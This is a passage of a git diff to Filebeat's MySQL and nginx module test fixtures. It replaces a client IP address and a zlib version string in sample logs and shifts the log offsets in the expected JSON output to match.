-161209 14:18:56 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:56 InnoDB: Compressed tables use zlib 1.128.3.4
 161209 14:18:56 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:56 InnoDB: Completed initialization of buffer pool
 161209 14:18:57 InnoDB: highest supported file format is Barracuda.
@@ -196,7 +196,7 @@ Version: '5.5.53-0ubuntu0.12.04.1'  socket: '/var/run/mysqld/mysqld.sock'  port:
 161209 14:37:57 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:37:57 InnoDB: The InnoDB memory heap is disabled
 161209 14:37:57 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:37:57 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:37:57 InnoDB: Compressed tables use zlib 1.128.3.4
 161209 14:37:57 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:37:57 InnoDB: Completed initialization of buffer pool
 161209 14:37:57 InnoDB: highest supported file format is Barracuda.
diff --git a/filebeat/module/mysql/error/test/mysql-ubuntu-5.5.53.log-expected.json b/filebeat/module/mysql/error/test/mysql-ubuntu-5.5.53.log-expected.json
index c9c94ad66b0a..7bff59c06c32 100644
--- a/filebeat/module/mysql/error/test/mysql-ubuntu-5.5.53.log-expected.json
+++ b/filebeat/module/mysql/error/test/mysql-ubuntu-5.5.53.log-expected.json
@@ -88,7 +88,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.offset": 374,
-        "message": "InnoDB: Compressed tables use zlib 1.2.3.4",
+        "message": "InnoDB: Compressed tables use zlib 1.128.3.4",
         "service.type": "mysql"
     },
     {
@@ -105,7 +105,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 433,
+        "log.offset": 435,
         "message": "InnoDB: Initializing buffer pool, size = 128.0M",
         "service.type": "mysql"
     },
@@ -126,7 +126,7 @@
         "log.flags": [
             "multiline"
         ],
-        "log.offset": 497,
+        "log.offset": 499,
         "message": "InnoDB: Completed initialization of buffer pool\nInnoDB: The first specified data file ./ibdata1 did not exist:\nInnoDB: a new database to be created!",
         "service.type": "mysql"
     },
@@ -147,7 +147,7 @@
         "log.flags": [
             "multiline"
         ],
-        "log.offset": 662,
+        "log.offset": 664,
         "message": "InnoDB: Setting file ./ibdata1 size to 10 MB\nInnoDB: Database physically writes the file full: wait...",
         "service.type": "mysql"
     },
@@ -168,7 +168,7 @@
         "log.flags": [
             "multiline"
         ],
-        "log.offset": 782,
+        "log.offset": 784,
         "message": "InnoDB: Log file ./ib_logfile0 did not exist: new to be created\nInnoDB: Setting log file ./ib_logfile0 size to 5 MB\nInnoDB: Database physically writes the file full: wait...",
         "service.type": "mysql"
     },
@@ -189,7 +189,7 @@
         "log.flags": [
             "multiline"
         ],
-        "log.offset": 973,
+        "log.offset": 975,
         "message": "InnoDB: Log file ./ib_logfile1 did not exist: new to be created\nInnoDB: Setting log file ./ib_logfile1 size to 5 MB\nInnoDB: Database physically writes the file full: wait...\nInnoDB: Doublewrite buffer not found: creating new\nInnoDB: Doublewrite buffer created\nInnoDB: 127 rollback segment(s) active.\nInnoDB: Creating foreign key constraint system tables\nInnoDB: Foreign key constraint system tables created",
         "service.type": "mysql"
     },
@@ -207,7 +207,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 1397,
+        "log.offset": 1399,
         "message": "InnoDB: Waiting for the background threads to start",
         "service.type": "mysql"
     },
@@ -225,7 +225,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 1466,
+        "log.offset": 1468,
         "message": "InnoDB: 5.5.53 started; log sequence number 0",
         "service.type": "mysql"
     },
@@ -243,7 +243,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 1528,
+        "log.offset": 1530,
         "message": "InnoDB: Starting shutdown...",
         "service.type": "mysql"
     },
@@ -261,7 +261,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 1574,
+        "log.offset": 1576,
         "message": "InnoDB: Shutdown completed; log sequence number 1595675",
         "service.type": "mysql"
     },
@@ -280,7 +280,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Warning",
-        "log.offset": 1647,
+        "log.offset": 1649,
         "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.",
         "service.type": "mysql"
     },
@@ -299,7 +299,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Note",
-        "log.offset": 1838,
+        "log.offset": 1840,
         "message": "Plugin 'FEDERATED' is disabled.",
         "service.type": "mysql"
     },
@@ -317,7 +317,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 1893,
+        "log.offset": 1895,
         "message": "InnoDB: The InnoDB memory heap is disabled",
         "service.type": "mysql"
     },
@@ -335,7 +335,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 1952,
+        "log.offset": 1954,
         "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins",
         "service.type": "mysql"
     },
@@ -353,8 +353,8 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 2021,
-        "message": "InnoDB: Compressed tables use zlib 1.2.3.4",
+        "log.offset": 2023,
+        "message": "InnoDB: Compressed tables use zlib 1.128.3.4",
         "service.type": "mysql"
     },
     {
@@ -371,7 +371,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 2080,
+        "log.offset": 2084,
         "message": "InnoDB: Initializing buffer pool, size = 128.0M",
         "service.type": "mysql"
     },
@@ -389,7 +389,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 2144,
+        "log.offset": 2148,
         "message": "InnoDB: Completed initialization of buffer pool",
         "service.type": "mysql"
     },
@@ -407,7 +407,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 2208,
+        "log.offset": 2212,
         "message": "InnoDB: highest supported file format is Barracuda.",
         "service.type": "mysql"
     },
@@ -425,7 +425,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 2276,
+        "log.offset": 2280,
         "message": "InnoDB: Waiting for the background threads to start",
         "service.type": "mysql"
     },
@@ -446,7 +446,7 @@
         "log.flags": [
             "multiline"
         ],
-        "log.offset": 2345,
+        "log.offset": 2349,
         "message": "InnoDB: 5.5.53 started; log sequence number 1595675\nERROR: 1064  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ALTER TABLE user ADD column Show_view_priv enum('N','Y') CHARACTER SET utf8 NOT ' at line 1",
         "service.type": "mysql"
     },
@@ -469,7 +469,7 @@
             "multiline"
         ],
         "log.level": "ERROR",
-        "log.offset": 2653,
+        "log.offset": 2657,
         "message": "Aborting\n",
         "service.type": "mysql"
     },
@@ -487,7 +487,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 2687,
+        "log.offset": 2691,
         "message": "InnoDB: Starting shutdown...",
         "service.type": "mysql"
     },
@@ -505,7 +505,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 2733,
+        "log.offset": 2737,
         "message": "InnoDB: Shutdown completed; log sequence number 1595675",
         "service.type": "mysql"
     },
@@ -527,7 +527,7 @@
             "multiline"
         ],
         "log.level": "Note",
-        "log.offset": 2806,
+        "log.offset": 2810,
         "message": "/usr/sbin/mysqld: Shutdown complete\n",
         "service.type": "mysql"
     },
@@ -546,7 +546,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Warning",
-        "log.offset": 2866,
+        "log.offset": 2870,
         "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.",
         "service.type": "mysql"
     },
@@ -565,7 +565,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Note",
-        "log.offset": 3057,
+        "log.offset": 3061,
         "message": "Plugin 'FEDERATED' is disabled.",
         "service.type": "mysql"
     },
@@ -583,7 +583,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 3112,
+        "log.offset": 3116,
         "message": "InnoDB: The InnoDB memory heap is disabled",
         "service.type": "mysql"
     },
@@ -601,7 +601,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 3171,
+        "log.offset": 3175,
         "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins",
         "service.type": "mysql"
     },
@@ -619,8 +619,8 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 3240,
-        "message": "InnoDB: Compressed tables use zlib 1.2.3.4",
+        "log.offset": 3244,
+        "message": "InnoDB: Compressed tables use zlib 1.128.3.4",
         "service.type": "mysql"
     },
     {
@@ -637,7 +637,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 3299,
+        "log.offset": 3305,
         "message": "InnoDB: Initializing buffer pool, size = 128.0M",
         "service.type": "mysql"
     },
@@ -655,7 +655,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 3363,
+        "log.offset": 3369,
         "message": "InnoDB: Completed initialization of buffer pool",
         "service.type": "mysql"
     },
@@ -673,7 +673,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 3427,
+        "log.offset": 3433,
         "message": "InnoDB: highest supported file format is Barracuda.",
         "service.type": "mysql"
     },
@@ -691,7 +691,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 3495,
+        "log.offset": 3501,
         "message": "InnoDB: Waiting for the background threads to start",
         "service.type": "mysql"
     },
@@ -709,7 +709,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 3564,
+        "log.offset": 3570,
         "message": "InnoDB: 5.5.53 started; log sequence number 1595675",
         "service.type": "mysql"
     },
@@ -727,7 +727,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 3632,
+        "log.offset": 3638,
         "message": "InnoDB: Starting shutdown...",
         "service.type": "mysql"
     },
@@ -750,7 +750,7 @@
             "multiline"
         ],
         "log.level": "ERROR",
-        "log.offset": 3678,
+        "log.offset": 3684,
         "message": "Aborting\n",
         "service.type": "mysql"
     },
@@ -768,7 +768,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 3712,
+        "log.offset": 3718,
         "message": "InnoDB: Starting shutdown...",
         "service.type": "mysql"
     },
@@ -786,7 +786,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 3758,
+        "log.offset": 3764,
         "message": "InnoDB: Shutdown completed; log sequence number 1595675",
         "service.type": "mysql"
     },
@@ -808,7 +808,7 @@
             "multiline"
         ],
         "log.level": "Note",
-        "log.offset": 3831,
+        "log.offset": 3837,
         "message": "/usr/sbin/mysqld: Shutdown complete\n",
         "service.type": "mysql"
     },
@@ -827,7 +827,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Warning",
-        "log.offset": 3891,
+        "log.offset": 3897,
         "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.",
         "service.type": "mysql"
     },
@@ -846,7 +846,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Note",
-        "log.offset": 4082,
+        "log.offset": 4088,
         "message": "Plugin 'FEDERATED' is disabled.",
         "service.type": "mysql"
     },
@@ -864,7 +864,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 4137,
+        "log.offset": 4143,
         "message": "InnoDB: The InnoDB memory heap is disabled",
         "service.type": "mysql"
     },
@@ -882,7 +882,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 4196,
+        "log.offset": 4202,
         "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins",
         "service.type": "mysql"
     },
@@ -900,8 +900,8 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 4265,
-        "message": "InnoDB: Compressed tables use zlib 1.2.3.4",
+        "log.offset": 4271,
+        "message": "InnoDB: Compressed tables use zlib 1.128.3.4",
         "service.type": "mysql"
     },
     {
@@ -918,7 +918,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 4324,
+        "log.offset": 4332,
         "message": "InnoDB: Initializing buffer pool, size = 128.0M",
         "service.type": "mysql"
     },
@@ -936,7 +936,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 4388,
+        "log.offset": 4396,
         "message": "InnoDB: Completed initialization of buffer pool",
         "service.type": "mysql"
     },
@@ -954,7 +954,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 4452,
+        "log.offset": 4460,
         "message": "InnoDB: highest supported file format is Barracuda.",
         "service.type": "mysql"
     },
@@ -972,7 +972,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 4520,
+        "log.offset": 4528,
         "message": "InnoDB: Waiting for the background threads to start",
         "service.type": "mysql"
     },
@@ -990,7 +990,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 4589,
+        "log.offset": 4597,
         "message": "InnoDB: 5.5.53 started; log sequence number 1595675",
         "service.type": "mysql"
     },
@@ -1009,7 +1009,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Note",
-        "log.offset": 4657,
+        "log.offset": 4665,
         "message": "Server hostname (bind-address): '127.0.0.1'; port: 3306",
         "service.type": "mysql"
     },
@@ -1028,7 +1028,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Note",
-        "log.offset": 4736,
+        "log.offset": 4744,
         "message": "- '127.0.0.1' resolves to '127.0.0.1';",
         "service.type": "mysql"
     },
@@ -1047,7 +1047,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Note",
-        "log.offset": 4800,
+        "log.offset": 4808,
         "message": "Server socket created on IP: '127.0.0.1'.",
         "service.type": "mysql"
     },
@@ -1066,7 +1066,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Note",
-        "log.offset": 4865,
+        "log.offset": 4873,
         "message": "Event Scheduler: Loaded 0 events",
         "service.type": "mysql"
     },
@@ -1088,7 +1088,7 @@
             "multiline"
         ],
         "log.level": "Note",
-        "log.offset": 4921,
+        "log.offset": 4929,
         "message": "/usr/sbin/mysqld: ready for connections.\nVersion: '5.5.53-0ubuntu0.12.04.1'  socket: '/var/run/mysqld/mysqld.sock'  port: 3306  (Ubuntu)",
         "service.type": "mysql"
     },
@@ -1110,7 +1110,7 @@
             "multiline"
         ],
         "log.level": "Note",
-        "log.offset": 5081,
+        "log.offset": 5089,
         "message": "/usr/sbin/mysqld: Normal shutdown\n",
         "service.type": "mysql"
     },
@@ -1129,7 +1129,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Note",
-        "log.offset": 5139,
+        "log.offset": 5147,
         "message": "Event Scheduler: Purging the queue. 0 events",
         "service.type": "mysql"
     },
@@ -1147,7 +1147,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 5207,
+        "log.offset": 5215,
         "message": "InnoDB: Starting shutdown...",
         "service.type": "mysql"
     },
@@ -1165,7 +1165,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 5253,
+        "log.offset": 5261,
         "message": "InnoDB: Shutdown completed; log sequence number 1595685",
         "service.type": "mysql"
     },
@@ -1187,7 +1187,7 @@
             "multiline"
         ],
         "log.level": "Note",
-        "log.offset": 5326,
+        "log.offset": 5334,
         "message": "/usr/sbin/mysqld: Shutdown complete\n",
         "service.type": "mysql"
     },
@@ -1206,7 +1206,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Warning",
-        "log.offset": 5386,
+        "log.offset": 5394,
         "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.",
         "service.type": "mysql"
     },
@@ -1225,7 +1225,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Note",
-        "log.offset": 5577,
+        "log.offset": 5585,
         "message": "Plugin 'FEDERATED' is disabled.",
         "service.type": "mysql"
     },
@@ -1243,7 +1243,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 5632,
+        "log.offset": 5640,
         "message": "InnoDB: The InnoDB memory heap is disabled",
         "service.type": "mysql"
     },
@@ -1261,7 +1261,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 5691,
+        "log.offset": 5699,
         "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins",
         "service.type": "mysql"
     },
@@ -1279,8 +1279,8 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 5760,
-        "message": "InnoDB: Compressed tables use zlib 1.2.3.4",
+        "log.offset": 5768,
+        "message": "InnoDB: Compressed tables use zlib 1.128.3.4",
         "service.type": "mysql"
     },
     {
@@ -1297,7 +1297,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 5819,
+        "log.offset": 5829,
         "message": "InnoDB: Initializing buffer pool, size = 128.0M",
         "service.type": "mysql"
     },
@@ -1315,7 +1315,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 5883,
+        "log.offset": 5893,
         "message": "InnoDB: Completed initialization of buffer pool",
         "service.type": "mysql"
     },
@@ -1333,7 +1333,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 5947,
+        "log.offset": 5957,
         "message": "InnoDB: highest supported file format is Barracuda.",
         "service.type": "mysql"
     },
@@ -1351,7 +1351,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 6015,
+        "log.offset": 6025,
         "message": "InnoDB: Waiting for the background threads to start",
         "service.type": "mysql"
     },
@@ -1369,7 +1369,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 6084,
+        "log.offset": 6094,
         "message": "InnoDB: 5.5.53 started; log sequence number 1595685",
         "service.type": "mysql"
     },
@@ -1388,7 +1388,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Note",
-        "log.offset": 6152,
+        "log.offset": 6162,
         "message": "Server hostname (bind-address): '127.0.0.1'; port: 3306",
         "service.type": "mysql"
     },
@@ -1407,7 +1407,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Note",
-        "log.offset": 6231,
+        "log.offset": 6241,
         "message": "- '127.0.0.1' resolves to '127.0.0.1';",
         "service.type": "mysql"
     },
@@ -1426,7 +1426,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Note",
-        "log.offset": 6295,
+        "log.offset": 6305,
         "message": "Server socket created on IP: '127.0.0.1'.",
         "service.type": "mysql"
     },
@@ -1445,7 +1445,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Note",
-        "log.offset": 6360,
+        "log.offset": 6370,
         "message": "Event Scheduler: Loaded 0 events",
         "service.type": "mysql"
     },
@@ -1467,7 +1467,7 @@
             "multiline"
         ],
         "log.level": "Note",
-        "log.offset": 6416,
+        "log.offset": 6426,
         "message": "/usr/sbin/mysqld: ready for connections.\nVersion: '5.5.53-0ubuntu0.12.04.1-log'  socket: '/var/run/mysqld/mysqld.sock'  port: 3306  (Ubuntu)",
         "service.type": "mysql"
     },
@@ -1486,7 +1486,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Warning",
-        "log.offset": 6580,
+        "log.offset": 6590,
         "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.",
         "service.type": "mysql"
     },
@@ -1505,7 +1505,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Note",
-        "log.offset": 6771,
+        "log.offset": 6781,
         "message": "Plugin 'FEDERATED' is disabled.",
         "service.type": "mysql"
     },
@@ -1523,7 +1523,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 6826,
+        "log.offset": 6836,
         "message": "InnoDB: The InnoDB memory heap is disabled",
         "service.type": "mysql"
     },
@@ -1541,7 +1541,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 6885,
+        "log.offset": 6895,
         "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins",
         "service.type": "mysql"
     },
@@ -1559,8 +1559,8 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 6954,
-        "message": "InnoDB: Compressed tables use zlib 1.2.3.4",
+        "log.offset": 6964,
+        "message": "InnoDB: Compressed tables use zlib 1.128.3.4",
         "service.type": "mysql"
     },
     {
@@ -1577,7 +1577,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 7013,
+        "log.offset": 7025,
         "message": "InnoDB: Initializing buffer pool, size = 128.0M",
         "service.type": "mysql"
     },
@@ -1598,7 +1598,7 @@
         "log.flags": [
             "multiline"
         ],
-        "log.offset": 7077,
+        "log.offset": 7089,
         "message": "InnoDB: Completed initialization of buffer pool\nInnoDB: The first specified data file ./ibdata1 did not exist:\nInnoDB: a new database to be created!",
         "service.type": "mysql"
     },
@@ -1619,7 +1619,7 @@
         "log.flags": [
             "multiline"
         ],
-        "log.offset": 7242,
+        "log.offset": 7254,
         "message": "InnoDB: Setting file ./ibdata1 size to 10 MB\nInnoDB: Database physically writes the file full: wait...",
         "service.type": "mysql"
     },
@@ -1640,7 +1640,7 @@
         "log.flags": [
             "multiline"
         ],
-        "log.offset": 7362,
+        "log.offset": 7374,
         "message": "InnoDB: Log file ./ib_logfile0 did not exist: new to be created\nInnoDB: Setting log file ./ib_logfile0 size to 5 MB\nInnoDB: Database physically writes the file full: wait...",
         "service.type": "mysql"
     },
@@ -1661,7 +1661,7 @@
         "log.flags": [
             "multiline"
         ],
-        "log.offset": 7553,
+        "log.offset": 7565,
         "message": "InnoDB: Log file ./ib_logfile1 did not exist: new to be created\nInnoDB: Setting log file ./ib_logfile1 size to 5 MB\nInnoDB: Database physically writes the file full: wait...\nInnoDB: Doublewrite buffer not found: creating new\nInnoDB: Doublewrite buffer created\nInnoDB: 127 rollback segment(s) active.\nInnoDB: Creating foreign key constraint system tables\nInnoDB: Foreign key constraint system tables created",
         "service.type": "mysql"
     },
@@ -1679,7 +1679,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 7977,
+        "log.offset": 7989,
         "message": "InnoDB: Waiting for the background threads to start",
         "service.type": "mysql"
     },
@@ -1697,7 +1697,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 8046,
+        "log.offset": 8058,
         "message": "InnoDB: 5.5.53 started; log sequence number 0",
         "service.type": "mysql"
     },
@@ -1715,7 +1715,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 8108,
+        "log.offset": 8120,
         "message": "InnoDB: Starting shutdown...",
         "service.type": "mysql"
     },
@@ -1733,7 +1733,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 8154,
+        "log.offset": 8166,
         "message": "InnoDB: Shutdown completed; log sequence number 1595675",
         "service.type": "mysql"
     },
@@ -1752,7 +1752,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Warning",
-        "log.offset": 8227,
+        "log.offset": 8239,
         "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.",
         "service.type": "mysql"
     },
@@ -1771,7 +1771,7 @@
         "fileset.name": "error",
         "input.type": "log",
         "log.level": "Note",
-        "log.offset": 8418,
+        "log.offset": 8430,
         "message": "Plugin 'FEDERATED' is disabled.",
         "service.type": "mysql"
     },
@@ -1789,7 +1789,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 8473,
+        "log.offset": 8485,
         "message": "InnoDB: The InnoDB memory heap is disabled",
         "service.type": "mysql"
     },
@@ -1807,7 +1807,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 8532,
+        "log.offset": 8544,
         "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins",
         "service.type": "mysql"
     },
@@ -1825,8 +1825,8 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 8601,
-        "message": "InnoDB: Compressed tables use zlib 1.2.3.4",
+        "log.offset": 8613,
+        "message": "InnoDB: Compressed tables use zlib 1.128.3.4",
         "service.type": "mysql"
     },
     {
@@ -1843,7 +1843,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 8660,
+        "log.offset": 8674,
         "message": "InnoDB: Initializing buffer pool, size = 128.0M",
         "service.type": "mysql"
     },
@@ -1861,7 +1861,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 8724,
+        "log.offset": 8738,
         "message": "InnoDB: Completed initialization of buffer pool",
         "service.type": "mysql"
     },
@@ -1879,7 +1879,7 @@
         ],
         "fileset.name": "error",
         "input.type": "log",
-        "log.offset": 8788,
+        "log.offset": 8802,
         "message": "InnoDB: highest supported file format is Barracuda.",
         "service.type": "mysql"
     }
diff --git a/filebeat/module/nginx/access/test/access.log b/filebeat/module/nginx/access/test/access.log
index 7acb1428af89..42ec0189320e 100644
--- a/filebeat/module/nginx/access/test/access.log
+++ b/filebeat/module/nginx/access/test/access.log
@@ -1,11 +1,11 @@
-77.179.66.156 - - [25/Oct/2016:14:49:33 +0200] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36"
-77.179.66.156 - - [25/Oct/2016:14:49:34 +0200] "GET /favicon.ico HTTP/1.1" 404 571 "http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36"
-77.179.66.156 - - [25/Oct/2016:14:50:44 +0200] "GET /adsasd HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36"
-77.179.66.156 - - [07/Dec/2016:10:34:43 +0100] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
-77.179.66.156 - - [07/Dec/2016:10:34:43 +0100] "GET /favicon.ico HTTP/1.1" 404 571 "http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
-77.179.66.156 - - [07/Dec/2016:10:43:18 +0100] "GET /test HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
-77.179.66.156 - - [07/Dec/2016:10:43:21 +0100] "GET /test HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
-77.179.66.156 - - [07/Dec/2016:10:43:23 +0100] "GET /test1 HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
+89.160.20.156 - - [25/Oct/2016:14:49:33 +0200] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36"
+89.160.20.156 - - [25/Oct/2016:14:49:34 +0200] "GET /favicon.ico HTTP/1.1" 404 571 "http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36"
+89.160.20.156 - - [25/Oct/2016:14:50:44 +0200] "GET /adsasd HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36"
+89.160.20.156 - - [07/Dec/2016:10:34:43 +0100] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
+89.160.20.156 - - [07/Dec/2016:10:34:43 +0100] "GET /favicon.ico HTTP/1.1" 404 571 "http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
+89.160.20.156 - - [07/Dec/2016:10:43:18 +0100] "GET /test HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
+89.160.20.156 - - [07/Dec/2016:10:43:21 +0100] "GET /test HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
+89.160.20.156 - - [07/Dec/2016:10:43:23 +0100] "GET /test1 HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
